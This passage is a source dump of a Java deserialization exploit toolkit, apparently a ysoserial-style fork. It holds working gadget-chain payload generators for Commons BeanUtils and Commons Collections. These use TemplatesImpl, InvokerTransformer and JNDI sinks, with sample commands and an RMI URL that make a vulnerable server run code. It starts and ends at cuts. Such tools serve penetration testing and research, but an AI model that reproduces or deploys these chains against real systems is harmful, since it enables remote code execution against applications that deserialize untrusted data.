TopNAggregator.PartialResult(extractor2, 2); 55 | AttributeHolder attributeHolder = new AttributeHolder(); 56 | sortedBag.add(1); 57 | 58 | Field m_comparator = sortedBag.getClass().getSuperclass().getDeclaredField("m_comparator"); 59 | m_comparator.setAccessible(true); 60 | m_comparator.set(sortedBag, extractor); 61 | 62 | Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class); 63 | setInternalValue.setAccessible(true); 64 | setInternalValue.invoke(attributeHolder, sortedBag); 65 | 66 | return attributeHolder; 67 | } 68 | } -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonsbeanutils/CBVersionEnum.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonsbeanutils; 2 | 3 | import com.ppp.Printer; 4 | 5 | /** 6 | * @author Whoopsunix 7 | */ 8 | public enum CBVersionEnum { 9 | // -2044202215314119608 10 | Default("default", 0L), 11 | V_1_8_3("1.8.3", -3490850999041592962L), 12 | V_1_6("1.6", 2573799559215537819L), 13 | V_1_5("1.5", 5123381023979609048L), 14 | ; 15 | 16 | private final String version; 17 | private final long serialVersionUID; 18 | 19 | CBVersionEnum(String version, long serialVersionUID) { 20 | this.version = version; 21 | this.serialVersionUID = serialVersionUID; 22 | } 23 | 24 | public String getVersion() { 25 | return version; 26 | } 27 | 28 | public long getSerialVersionUID() { 29 | return serialVersionUID; 30 | } 31 | 32 | public static CBVersionEnum getCBVersion(String version) { 33 | for (CBVersionEnum cbVersionEnum : CBVersionEnum.values()) { 34 | if (cbVersionEnum.getVersion().equals(version)) { 35 | return cbVersionEnum; 36 | } 37 | } 38 | Printer.warn("Use default cb version"); 39 | return Default; 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonsbeanutils/CommonsBeanutils1.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonsbeanutils; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.chain.WrapSerialization; 8 | import com.ppp.secmgr.PayloadRunner; 9 | import com.ppp.sinks.SinkScheduler; 10 | import com.ppp.sinks.SinksHelper; 11 | import com.ppp.sinks.annotation.EnchantType; 12 | import com.ppp.sinks.annotation.Sink; 13 | 14 | import java.math.BigInteger; 15 | import java.util.Comparator; 16 | 17 | /** 18 | * @author Whoopsunix 19 | */ 20 | @Dependencies({"commons-beanutils:commons-beanutils:<=1.9.4", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) 21 | @Authors({Authors.FROHOFF}) 22 | @Sink({Sink.TemplatesImpl}) 23 | public class CommonsBeanutils1 implements ObjectPayload { 24 | 25 | public static void main(String[] args) throws Exception { 26 | // PayloadRunner.run(CommonsBeanutils1.class, args); 27 | 28 | SinksHelper sinksHelper = new SinksHelper(); 29 | sinksHelper.setSink(CommonsBeanutils1.class.getAnnotation(Sink.class).value()[0]); 30 | sinksHelper.setEnchant(EnchantType.DEFAULT); 31 | sinksHelper.setCbVersion(CBVersionEnum.V_1_8_3); 32 | sinksHelper.setCommand("open -a Calculator.app"); 33 | // sinksHelper.setCommand("whoami"); 34 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 35 | javaClassHelper.setExtendsAbstractTranslet(true); 36 | // javaClassHelper.setRandomJavaClassName(true); 37 | sinksHelper.setJavaClassHelper(javaClassHelper); 38 | PayloadRunner.run(CommonsBeanutils1.class, args, sinksHelper); 39 | 40 | // SinksHelper sinksHelper = new SinksHelper(); 41 | // sinksHelper.setSink(CommonsBeanutils1.class.getAnnotation(Sink.class).value()[0]); 42 | // sinksHelper.setEnchant(EnchantType.JavaClass); 43 | // JavaClassHelper javaClassHelper = new JavaClassHelper(); 44 | // javaClassHelper.setJavaClassHelperType(JavaClassHelperType.RceEcho); 45 | // javaClassHelper.setMiddleware(Middleware.Tomcat); 46 | // sinksHelper.setJavaClassHelper(javaClassHelper); 47 | // PayloadRunner.run(CommonsBeanutils1.class, args, sinksHelper); 48 | } 49 | 50 | public Object getObject(SinksHelper sinksHelper) throws Exception { 51 | // sink 52 | Object sinkObject = SinkScheduler.builder(sinksHelper); 53 | 54 | Object kickOffObject = getChain(sinkObject, sinksHelper.getCbVersion()); 55 | 56 | return kickOffObject; 57 | } 58 | 59 | public Object getChain(Object templates, CBVersionEnum version) throws Exception { 60 | Comparator comparator = BeanComparatorBuilder.scheduler(BeanComparatorBuilder.CompareEnum.BeanComparator, version); 61 | return BeanComparatorBuilder.queueGadgetMaker(comparator, templates, new BigInteger("1"), "outputProperties"); 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonsbeanutils/CommonsBeanutils2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonsbeanutils; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | 11 | import java.util.Comparator; 12 | 13 | /** 14 | * @author Whoopsunix 15 | */ 16 | @Dependencies({"commons-beanutils:commons-beanutils:<=1.9.4"}) 17 | @Authors({Authors.PHITHON}) 18 | @Sink({Sink.TemplatesImpl}) 19 | public class CommonsBeanutils2 implements ObjectPayload { 20 | 21 | public static void main(String[] args) throws Exception { 22 | PayloadRunner.run(CommonsBeanutils2.class, args); 23 | } 24 | 25 | public Object getObject(SinksHelper sinksHelper) throws Exception { 26 | // sink 27 | Object sinkObject = SinkScheduler.builder(sinksHelper); 28 | 29 | Object kickOffObject = getChain(sinkObject, sinksHelper.getCbVersion()); 30 | 31 | return kickOffObject; 32 | } 33 | 34 | public Object getChain(Object templates, CBVersionEnum version) throws Exception { 35 | Comparator comparator = BeanComparatorBuilder.scheduler(BeanComparatorBuilder.CompareEnum.CaseInsensitiveComparator, version); 36 | return BeanComparatorBuilder.queueGadgetMaker(comparator, templates, "1", "outputProperties"); 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonsbeanutils/CommonsBeanutils3.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonsbeanutils; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.EnchantType; 11 | import com.ppp.sinks.annotation.Sink; 12 | import com.sun.rowset.JdbcRowSetImpl; 13 | 14 | import java.math.BigInteger; 15 | import java.util.Comparator; 16 | 17 | /** 18 | * @author Whoopsunix 19 | */ 20 | @Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) 21 | @Authors({Authors.FROHOFF}) 22 | @Sink({Sink.JNDI}) 23 | public class CommonsBeanutils3 implements ObjectPayload { 24 | 25 | public static void main(String[] args) throws Exception { 26 | SinksHelper sinksHelper = new SinksHelper(); 27 | sinksHelper.setSink(CommonsBeanutils3.class.getAnnotation(Sink.class).value()[0]); 28 | sinksHelper.setEnchant(EnchantType.DEFAULT); 29 | sinksHelper.setCommand("rmi://127.0.0.1:1099/ym759z"); 30 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 31 | javaClassHelper.setExtendsAbstractTranslet(true); 32 | sinksHelper.setJavaClassHelper(javaClassHelper); 33 | 34 | PayloadRunner.run(CommonsBeanutils3.class, args, sinksHelper); 35 | 36 | // PayloadRunner.run(CommonsBeanutils3.class, args); 37 | } 38 | 39 | public Object getObject(SinksHelper sinksHelper) throws Exception { 40 | // sink 41 | Object sinkObject = SinkScheduler.builder(sinksHelper); 42 | 43 | Object kickOffObject = getChain(sinkObject, sinksHelper.getCbVersion()); 44 | 45 | return kickOffObject; 46 | } 47 | 48 | public Object getChain(Object url, CBVersionEnum version) throws Exception { 49 | JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); 50 | jdbcRowSet.setDataSourceName((String) url); 51 | jdbcRowSet.setMatchColumn("x"); 52 | 53 | Comparator comparator = BeanComparatorBuilder.scheduler(BeanComparatorBuilder.CompareEnum.BeanComparator, version); 54 | 55 | return BeanComparatorBuilder.queueGadgetMaker(comparator, jdbcRowSet, new BigInteger("1"), "databaseMetaData"); 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonsbeanutils/CommonsBeanutils4.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonsbeanutils; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.sun.org.apache.xerces.internal.dom.AttrNSImpl; 11 | import com.sun.org.apache.xerces.internal.dom.CoreDocumentImpl; 12 | 13 | import java.util.Comparator; 14 | 15 | /** 16 | * @author Whoopsunix 17 | * Ref: https://github.com/SummerSec/ShiroAttack2 18 | *

19 | * CommonsBeanutilsAttrCompare 20 | */ 21 | @Dependencies({"commons-beanutils:commons-beanutils:<=1.9.4"}) 22 | @Authors({Authors.DROPLET}) 23 | @Sink({Sink.TemplatesImpl}) 24 | public class CommonsBeanutils4 implements ObjectPayload { 25 | 26 | public static void main(String[] args) throws Exception { 27 | PayloadRunner.run(CommonsBeanutils4.class, args); 28 | } 29 | 30 | public Object getObject(SinksHelper sinksHelper) throws Exception { 31 | // sink 32 | Object sinkObject = SinkScheduler.builder(sinksHelper); 33 | 34 | Object kickOffObject = getChain(sinkObject, sinksHelper.getCbVersion()); 35 | 36 | return kickOffObject; 37 | } 38 | 39 | public Object getChain(Object templates, CBVersionEnum version) throws Exception { 40 | AttrNSImpl attrNS = new AttrNSImpl(new CoreDocumentImpl(), "1", "1", "1"); 41 | Comparator comparator = BeanComparatorBuilder.scheduler(BeanComparatorBuilder.CompareEnum.AttrCompare, version); 42 | return BeanComparatorBuilder.queueGadgetMaker(comparator, templates, attrNS, "outputProperties"); 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonsbeanutils/CommonsBeanutils5.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonsbeanutils; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.Reflections; 11 | import org.apache.commons.collections.bidimap.DualTreeBidiMap; 12 | 13 | import java.util.Comparator; 14 | import java.util.HashMap; 15 | import java.util.Map; 16 | 17 | /** 18 | * @author Whoopsunix 19 | *

20 | * CommonsBeanutilsDualTreeBidiMap 21 | */ 22 | @Dependencies({"commons-beanutils:commons-beanutils:<=1.9.4", "commons-collections:commons-collections:3.1"}) 23 | @Authors({Authors.Y4ER}) 24 | @Sink({Sink.TemplatesImpl}) 25 | public class CommonsBeanutils5 implements ObjectPayload { 26 | 27 | public static void main(String[] args) throws Exception { 28 | PayloadRunner.run(CommonsBeanutils5.class, args); 29 | } 30 | 31 | public Object getObject(SinksHelper sinksHelper) throws Exception { 32 | // sink 33 | Object sinkObject = SinkScheduler.builder(sinksHelper); 34 | 35 | Object kickOffObject = getChain(sinkObject, sinksHelper.getCbVersion()); 36 | 37 | return kickOffObject; 38 | } 39 | 40 | public Object getChain(Object templates, CBVersionEnum version) throws Exception { 41 | Comparator comparator = BeanComparatorBuilder.scheduler(BeanComparatorBuilder.CompareEnum.CaseInsensitiveComparator, version); 42 | 43 | DualTreeBidiMap dualTreeBidiMap = new DualTreeBidiMap(); 44 | HashMap map = new HashMap(); 45 | map.put(templates, templates); 46 | 47 | Reflections.setFieldValue(dualTreeBidiMap, "comparator", comparator); 48 | Reflections.setFieldValue(comparator, "property", "outputProperties"); 49 | Map[] maps = (Map[]) Reflections.getFieldValue(dualTreeBidiMap, "maps"); 50 | maps[0] = map; 51 | 52 | return dualTreeBidiMap; 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonsbeanutils/CommonsBeanutils6.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonsbeanutils; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.RanDomUtils; 11 | 12 | import java.util.Comparator; 13 | 14 | /** 15 | * @author Whoopsunix 16 | *

17 | * CommonsBeanutilsObjectToStringComparator 18 | */ 19 | @Dependencies({"commons-beanutils:commons-beanutils:<=1.9.4", "org.apache.commons:commons-lang3"}) 20 | @Authors({Authors.DROPLET}) 21 | @Sink({Sink.TemplatesImpl}) 22 | public class CommonsBeanutils6 implements ObjectPayload { 23 | 24 | public static void main(String[] args) throws Exception { 25 | PayloadRunner.run(CommonsBeanutils6.class, args); 26 | } 27 | 28 | public Object getObject(SinksHelper sinksHelper) throws Exception { 29 | // sink 30 | Object sinkObject = SinkScheduler.builder(sinksHelper); 31 | 32 | Object kickOffObject = getChain(sinkObject, sinksHelper.getCbVersion()); 33 | 34 | return kickOffObject; 35 | } 36 | 37 | public Object getChain(Object templates, CBVersionEnum version) throws Exception { 38 | Comparator comparator = BeanComparatorBuilder.scheduler(BeanComparatorBuilder.CompareEnum.ObjectToStringComparator, version); 39 | 40 | return BeanComparatorBuilder.queueGadgetMaker(comparator, templates, RanDomUtils.generateRandomString(1), "outputProperties"); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonsbeanutils/CommonsBeanutils7.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonsbeanutils; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import org.apache.logging.log4j.util.PropertySource; 11 | 12 | import java.util.Comparator; 13 | 14 | /** 15 | * @author Whoopsunix 16 | *

17 | * CommonsBeanutilsPropertySource 18 | */ 19 | @Dependencies({"commons-beanutils:commons-beanutils:<=1.9.4", "org.apache.logging.log4j:log4j-api:2.14.1"}) 20 | @Authors({Authors.SummerSec}) 21 | @Sink({Sink.TemplatesImpl}) 22 | public class CommonsBeanutils7 implements ObjectPayload { 23 | 24 | public static void main(String[] args) throws Exception { 25 | PayloadRunner.run(CommonsBeanutils7.class, args); 26 | } 27 | 28 | public Object getObject(SinksHelper sinksHelper) throws Exception { 29 | // sink 30 | Object sinkObject = SinkScheduler.builder(sinksHelper); 31 | 32 | Object kickOffObject = getChain(sinkObject, sinksHelper.getCbVersion()); 33 | 34 | return kickOffObject; 35 | } 36 | 37 | public Object getChain(Object templates, CBVersionEnum version) throws Exception { 38 | PropertySource propertySource = new PropertySource() { 39 | @Override 40 | public int getPriority() { 41 | return 0; 42 | } 43 | }; 44 | Comparator comparator = BeanComparatorBuilder.scheduler(BeanComparatorBuilder.CompareEnum.PropertySource, version); 45 | return BeanComparatorBuilder.queueGadgetMaker(comparator, templates, propertySource, "outputProperties"); 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonsbeanutils/CommonsBeanutils8.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonsbeanutils; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.RanDomUtils; 11 | 12 | import java.util.Comparator; 13 | 14 | /** 15 | * @author Whoopsunix 16 | *

17 | * CommonsBeanutilsReverseComparatorJDK 18 | */ 19 | @Dependencies({"commons-beanutils:commons-beanutils:<=1.9.4"}) 20 | @Authors({Authors.Whoopsunix}) 21 | @Sink({Sink.TemplatesImpl}) 22 | public class CommonsBeanutils8 implements ObjectPayload { 23 | 24 | public static void main(String[] args) throws Exception { 25 | PayloadRunner.run(CommonsBeanutils8.class, args); 26 | } 27 | 28 | public Object getObject(SinksHelper sinksHelper) throws Exception { 29 | // sink 30 | Object sinkObject = SinkScheduler.builder(sinksHelper); 31 | 32 | Object kickOffObject = getChain(sinkObject, sinksHelper.getCbVersion()); 33 | 34 | return kickOffObject; 35 | } 36 | 37 | public Object getChain(Object templates, CBVersionEnum version) throws Exception { 38 | Comparator comparator = BeanComparatorBuilder.scheduler(BeanComparatorBuilder.CompareEnum.ReverseComparator, version); 39 | return BeanComparatorBuilder.queueGadgetMaker(comparator, templates, RanDomUtils.generateRandomString(1), "outputProperties"); 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections3/CommonsCollections1.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections3; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.KickOff; 5 | import com.ppp.ObjectPayload; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.secmgr.PayloadRunner; 9 | import com.ppp.sinks.SinkScheduler; 10 | import com.ppp.sinks.SinksHelper; 11 | import com.ppp.sinks.annotation.EnchantEnums; 12 | import com.ppp.sinks.annotation.EnchantType; 13 | import com.ppp.sinks.annotation.Sink; 14 | import com.ppp.utils.Reflections; 15 | import org.apache.commons.collections.Transformer; 16 | import org.apache.commons.collections.functors.ChainedTransformer; 17 | import org.apache.commons.collections.functors.ConstantTransformer; 18 | import org.apache.commons.collections.map.LazyMap; 19 | 20 | import java.util.HashMap; 21 | import java.util.Map; 22 | 23 | /** 24 | * @author Whoopsunix 25 | */ 26 | @Dependencies({"commons-collections:commons-collections:<=3.2.1"}) 27 | @Authors({Authors.FROHOFF}) 28 | @Sink({Sink.InvokerTransformer3}) 29 | public class CommonsCollections1 implements ObjectPayload { 30 | 31 | public static void main(String[] args) throws Exception { 32 | // PayloadRunner.run(CommonsCollections1.class, args); 33 | 34 | SinksHelper sinksHelper = new SinksHelper(); 35 | sinksHelper.setSink(CommonsCollections1.class.getAnnotation(Sink.class).value()[0]); 36 | sinksHelper.setEnchant(EnchantType.DEFAULT); 37 | sinksHelper.setCommandType(EnchantEnums.ScriptEngine); 38 | sinksHelper.setSplit(true); 39 | sinksHelper.setCommand("open -a Calculator.app"); 40 | // sinksHelper.setCommand("ifconfig"); 41 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 42 | javaClassHelper.setExtendsAbstractTranslet(true); 43 | sinksHelper.setJavaClassHelper(javaClassHelper); 44 | PayloadRunner.run(CommonsCollections1.class, args, sinksHelper); 45 | } 46 | 47 | public Object getObject(SinksHelper sinksHelper) throws Exception { 48 | // sink 49 | Object sinkObject = SinkScheduler.builder(sinksHelper); 50 | 51 | Object kickOffObject = getChain(sinkObject); 52 | 53 | return kickOffObject; 54 | } 55 | 56 | public Object getChain(Object transformers) throws Exception { 57 | // chain 58 | final Transformer transformerChain = new ChainedTransformer( 59 | new Transformer[]{new ConstantTransformer(1)}); 60 | 61 | final Map innerMap = new HashMap(); 62 | 63 | final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); 64 | 65 | final Map mapProxy = KickOff.createMemoitizedProxy(lazyMap, Map.class); 66 | 67 | // kickoff 68 | Object annotationInvocationHandler = KickOff.annotationInvocationHandler(mapProxy); 69 | Reflections.setFieldValue(transformerChain, "iTransformers", transformers); 70 | 71 | return annotationInvocationHandler; 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections3/CommonsCollections10.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections3; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.ppp.utils.RanDomUtils; 11 | import com.ppp.utils.Reflections; 12 | import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; 13 | import org.apache.commons.collections.functors.ConstantTransformer; 14 | import org.apache.commons.collections.functors.FactoryTransformer; 15 | import org.apache.commons.collections.functors.InstantiateFactory; 16 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 17 | import org.apache.commons.collections.map.LazyMap; 18 | 19 | import javax.xml.transform.Templates; 20 | import java.util.HashMap; 21 | 22 | /** 23 | * @author Whoopsunix 24 | */ 25 | @Dependencies({"commons-collections:commons-collections:<=3.2.1"}) 26 | @Sink({Sink.TemplatesImpl}) 27 | @Authors() 28 | public class CommonsCollections10 implements ObjectPayload { 29 | 30 | public static void main(String[] args) throws Exception { 31 | PayloadRunner.run(CommonsCollections10.class, args); 32 | } 33 | 34 | public Object getObject(SinksHelper sinksHelper) throws Exception { 35 | // sink 36 | Object sinkObject = SinkScheduler.builder(sinksHelper); 37 | 38 | Object kickOffObject = getChain(sinkObject); 39 | 40 | return kickOffObject; 41 | } 42 | 43 | public Object getChain(Object templates) throws Exception { 44 | String s = RanDomUtils.generateRandomString(1); 45 | 46 | InstantiateFactory instantiateFactory = new InstantiateFactory(TrAXFilter.class, new Class[]{Templates.class}, new Object[]{templates}); 47 | FactoryTransformer factoryTransformer = new FactoryTransformer(instantiateFactory); 48 | ConstantTransformer constantTransformer = new ConstantTransformer(1); 49 | 50 | HashMap innerMap = new HashMap(); 51 | LazyMap outerMap = (LazyMap) LazyMap.decorate(innerMap, constantTransformer); 52 | TiedMapEntry entry = new TiedMapEntry(outerMap, s); 53 | 54 | HashMap hashMap = new HashMap(); 55 | hashMap.put(entry, s); 56 | Reflections.setFieldValue(outerMap, "factory", factoryTransformer); 57 | outerMap.clear(); 58 | 59 | return hashMap; 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections3/CommonsCollections1E.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections3; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.Reflections; 12 | import org.apache.commons.collections.Transformer; 13 | import org.apache.commons.collections.functors.ChainedTransformer; 14 | import org.apache.commons.collections.functors.ConstantTransformer; 15 | import org.apache.commons.collections.map.TransformedMap; 16 | 17 | import java.lang.annotation.Target; 18 | import java.util.HashMap; 19 | import java.util.Map; 20 | 21 | /** 22 | * @author Whoopsunix 23 | */ 24 | @Dependencies({"commons-collections:commons-collections:<=3.2.1"}) 25 | @Authors({Authors.MATTHIASKAISER}) 26 | @Sink({Sink.InvokerTransformer3}) 27 | public class CommonsCollections1E implements ObjectPayload { 28 | 29 | public static void main(String[] args) throws Exception { 30 | PayloadRunner.run(CommonsCollections1E.class, args); 31 | } 32 | 33 | public Object getObject(SinksHelper sinksHelper) throws Exception { 34 | // sink 35 | Object sinkObject = SinkScheduler.builder(sinksHelper); 36 | 37 | Object kickOffObject = getChain(sinkObject); 38 | 39 | return kickOffObject; 40 | } 41 | 42 | public Object getChain(Object transformers) throws Exception { 43 | final Transformer transformerChain = new ChainedTransformer( 44 | new Transformer[]{new ConstantTransformer(1)}); 45 | 46 | HashMap map = new HashMap(); 47 | map.put("value", "value"); 48 | 49 | Map transMap = TransformedMap.decorate(map, null, transformerChain); 50 | // Map transMap = (Map) Reflections.getFirstCtor("org.apache.commons.collections.map.TransformedMap").newInstance(map, null, transformerChain); 51 | 52 | Object annotationInvocationHandler = KickOff.annotationInvocationHandler(transMap, Target.class); 53 | // 即 ChainedTransformer 的 Transformer[] 54 | Reflections.setFieldValue(transformerChain, "iTransformers", transformers); 55 | 56 | return annotationInvocationHandler; 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections3/CommonsCollections3.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections3; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.KickOff; 5 | import com.ppp.ObjectPayload; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.secmgr.PayloadRunner; 9 | import com.ppp.sinks.SinkScheduler; 10 | import com.ppp.sinks.SinksHelper; 11 | import com.ppp.sinks.annotation.EnchantEnums; 12 | import com.ppp.sinks.annotation.EnchantType; 13 | import com.ppp.sinks.annotation.Sink; 14 | import com.ppp.utils.Reflections; 15 | import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; 16 | import org.apache.commons.collections.Transformer; 17 | import org.apache.commons.collections.functors.ChainedTransformer; 18 | import org.apache.commons.collections.functors.ConstantTransformer; 19 | import org.apache.commons.collections.functors.InstantiateTransformer; 20 | import org.apache.commons.collections.map.LazyMap; 21 | 22 | import javax.xml.transform.Templates; 23 | import java.lang.reflect.InvocationHandler; 24 | import java.util.HashMap; 25 | import java.util.Map; 26 | 27 | /** 28 | * @author Whoopsunix 29 | */ 30 | @Dependencies({"commons-collections:commons-collections:<=3.2.1"}) 31 | @Authors({Authors.FROHOFF}) 32 | @Sink({Sink.TemplatesImpl}) 33 | public class CommonsCollections3 implements ObjectPayload { 34 | 35 | public static void main(String[] args) throws Exception { 36 | // PayloadRunner.run(CommonsCollections3.class, args); 37 | 38 | SinksHelper sinksHelper = new SinksHelper(); 39 | sinksHelper.setSink(CommonsCollections3.class.getAnnotation(Sink.class).value()[0]); 40 | sinksHelper.setEnchant(EnchantType.DEFAULT); 41 | sinksHelper.setCommandType(EnchantEnums.ScriptEngine); 42 | sinksHelper.setSplit(true); 43 | sinksHelper.setCommand("open -a Calculator.app"); 44 | // sinksHelper.setCommand("ifconfig"); 45 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 46 | javaClassHelper.setExtendsAbstractTranslet(true); 47 | sinksHelper.setJavaClassHelper(javaClassHelper); 48 | PayloadRunner.run(CommonsCollections3.class, args, sinksHelper); 49 | } 50 | 51 | public Object getObject(SinksHelper sinksHelper) throws Exception { 52 | // sink 53 | Object sinkObject = SinkScheduler.builder(sinksHelper); 54 | 55 | Object kickOffObject = getChain(sinkObject); 56 | 57 | return kickOffObject; 58 | } 59 | 60 | public Object getChain(Object templates) throws Exception { 61 | final Transformer transformerChain = new ChainedTransformer( 62 | new Transformer[]{new ConstantTransformer(1)}); 63 | 64 | final Transformer[] transformers = new Transformer[]{ 65 | new ConstantTransformer(TrAXFilter.class), 66 | new InstantiateTransformer( 67 | new Class[]{Templates.class}, 68 | new Object[]{templates})}; 69 | 70 | final Map innerMap = new HashMap(); 71 | final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); 72 | final Map mapProxy = KickOff.createMemoitizedProxy(lazyMap, Map.class); 73 | 74 | InvocationHandler handler = KickOff.annotationInvocationHandler(mapProxy); 75 | Reflections.setFieldValue(transformerChain, "iTransformers", transformers); 76 | 77 | return handler; 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/commonscollections3/CommonsCollections5.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.commonscollections3; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.Reflections; 12 | import org.apache.commons.collections.Transformer; 13 | import org.apache.commons.collections.functors.ChainedTransformer; 14 | import org.apache.commons.collections.functors.ConstantTransformer; 15 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 16 | import org.apache.commons.collections.map.LazyMap; 17 | 18 | import java.util.HashMap; 19 | import java.util.Map; 20 | 21 | /** 22 | * @author Whoopsunix 23 | */ 24 | @Dependencies({"commons-collections:commons-collections:3.1"}) 25 | @Authors({Authors.MATTHIASKAISER, Authors.JASINNER}) 26 | @Sink({Sink.InvokerTransformer3}) 27 | public class CommonsCollections5 implements ObjectPayload { 28 | 29 | public static void main(String[] args) throws Exception { 30 | PayloadRunner.run(CommonsCollections5.class, args); 31 | } 32 | 33 | public Object getObject(SinksHelper sinksHelper) throws Exception { 34 | // sink 35 | Object sinkObject = SinkScheduler.builder(sinksHelper); 36 | 37 | Object kickOffObject = getChain(sinkObject); 38 | 39 | return kickOffObject; 40 | } 41 | 42 | public Object getChain(Object transformers) throws 